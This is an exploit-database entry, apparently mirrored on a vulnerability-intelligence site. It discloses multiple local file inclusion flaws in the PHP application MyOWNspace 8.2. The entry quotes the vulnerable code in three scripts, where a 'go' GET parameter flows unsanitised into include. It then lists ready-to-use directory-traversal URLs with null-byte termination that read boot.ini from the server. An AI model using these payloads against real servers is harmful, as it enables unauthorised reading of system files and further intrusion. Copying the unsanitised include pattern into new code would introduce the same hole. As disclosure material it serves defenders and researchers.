Lucene search
K

MyOWNspace 8.2 - Multiple Local File Inclusions

🗓️ 27 Mar 2010 00:00:00Reported by ITSecTeamType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 19 Views

MyOWNspace 8.2 - Multiple Local File Inclusions vulnerabilit

Code
===========================================================================
( #Topic    : MyOWNspace_v8.2
( #Bug type : multi local file include
( #Download : http://sourceforge.net/project/platformdownload.php?group_id=174729
( #Advisory : 

===========================================================================
( #Author : ItSecTeam
( #Email  : [email protected]
( #Website: http://www.itsecteam.com
( #Forum  : http://forum.ITSecTeam.com
( #discovered by : ahmadbady

vuls:===================================================================
path/graph.php

if (isset($_GET['go'])) {$go=$_GET['go']; line 28   

$i=$go;                                   line 30   
.
.
.
$friends="myownfriends/friends.".$i.".php";  line 38
include $friends;                            line 39
.
.
.
.
.
$friends="myownfriends/friends.".$i.".php"; line 74  
include $friends;                           line 75  
---------------------------------------------------------------------------
path/myowngraph.php  eror graph.php line 39;

if (isset($_GET['go'])) {$go=$_GET['go']; line 28

$i=$go;                                    line 29

include $friends; line 39
---------------------------------------------------------------------------
path/showmyownfriends.php

$conf_file="myownfriends/friends.".$_GET['go'].".php"; line 3

include $conf_file;                                    line 17 
---------------------------------------------------------------------------
exploit:===================================================================

path/graph.php?go=../../../../../../../boot.ini%00
path/myowngraph.php?go=../../../../../../../boot.ini%00
path/showmyownfriends.php?go=../../../../../../../boot.ini%00
---------------------------------------------------------------------------

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation